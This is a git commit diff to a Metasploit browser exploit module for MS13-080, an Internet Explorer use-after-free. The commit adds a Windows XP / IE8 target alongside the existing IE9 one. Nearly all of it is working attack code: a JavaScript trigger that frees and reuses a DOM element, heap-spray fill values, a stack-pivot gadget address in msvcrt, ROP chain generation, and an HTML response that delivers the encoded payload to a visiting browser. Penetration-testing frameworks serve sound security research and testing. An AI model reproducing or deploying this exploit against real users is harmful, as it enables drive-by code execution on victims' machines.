ADD winxpIE8 exploit for MS13-080

bug/bundler_fix
Rich Lundeen 2014-11-14 17:16:51 -08:00
parent 386a1912e5
commit 17ab0cf96e
1 changed files with 98 additions and 11 deletions

View File

@ -39,7 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Unknown', # Exploit in the wild first spotted in Japan 'Unknown', # Exploit in the wild first spotted in Japan
'sinn3r' # Metasploit (thx binjo for the heads up!) 'sinn3r', # Metasploit (thx binjo for the heads up!)
'Rich Lundeen' # IE8 windows xp
], ],
'References' => 'References' =>
[ [
@ -53,16 +54,29 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' =>
{ {
:source => /script/i, :source => /script/i
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:ua_ver => "9.0",
:os_flavor => "7",
:office => /2007|2010/
}, },
'Targets' => 'Targets' =>
[ [
[ 'Automatic', {} ] [ 'Automatic', {} ],
[
'Windows 7 with Office 2007|2010',
{
:os_name => /win/i,
:ua_name => OperatingSystems::WINDOWS,
:ua_ver => "9.0",
:os_flavor => "7",
:office => /2007|2010/
}
],
[
'Windows XP with IE 8',
{
:os_name => "Windows XP",
:ua_name => HttpClients::IE,
:ua_ver => "8.0"
}
]
], ],
'Payload' => 'Payload' =>
{ {
@ -116,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
p p
end end
def get_exploit_html(cli, target_info) def get_exploit_html_ie9(cli, target_info)
gadgets = {} gadgets = {}
case target_info[:office] case target_info[:office]
when '2007' when '2007'
@ -238,9 +252,75 @@ window.onload = function() {
| |
end end
def get_exploit_html_ie8(cli, target_info)
code = payload.encoded
#address containing our heap spray is 0x20302020
spray_addr = "\\u2024\\u2030"
#size to fill after free is 0x50
free_fill = spray_addr + "\\u2424" * (((0x50-1)/2)-2)
rop = [
0x77c3868a, # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret ;
0x20302020 # pointer to stack pivot
].pack("V*")
rop << generate_rop_payload('msvcrt', code, { 'target'=>'WINDOWS XP SP3' }) << code
js_rop = Rex::Text.to_unescape(rop)
%Q|
<html>
<script>
#{js_property_spray}
tt = new Array(30);
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
for(i = 0; i < tt.length; i++) {
tt[i] = document.createElement('div');
tt[i].className ="#{free_fill}";
}
var s = unescape("#{js_rop}");
sprayHeap({shellcode:s});
}
id_0['outerText']="";
id_0.setCapture();
id_1.setCapture();
}
window.onload = function() {
trigger();
}
</script>
|
end
def on_request_exploit(cli, request, target_info) def on_request_exploit(cli, request, target_info)
html = get_exploit_html(cli, target_info) case target_info[:ua_ver]
when "8.0"
html = get_exploit_html_ie8(cli, target_info)
when "9.0"
html = get_exploit_html_ie9(cli, target_info)
end
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
end end
end end
@ -258,6 +338,13 @@ hxds.dll (Microsoft® Help Data Services Module)
FileVersion: 2.05.50727.4039 (QFE.050727-4000) FileVersion: 2.05.50727.4039 (QFE.050727-4000)
mshtml.dll mshtml.dll
WinXP IE8 DLL info:
ProductVersion: 8.0.6001.18702
FileVersion: 8.0.6001.18702
FileDescription: Microsoft (R) HTML Viewer
Win7 IE9 DLL info:
ProductVersion: 9.00.8112.16446 ProductVersion: 9.00.8112.16446
FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)
FileDescription: Microsoft (R) HTML Viewer FileDescription: Microsoft (R) HTML Viewer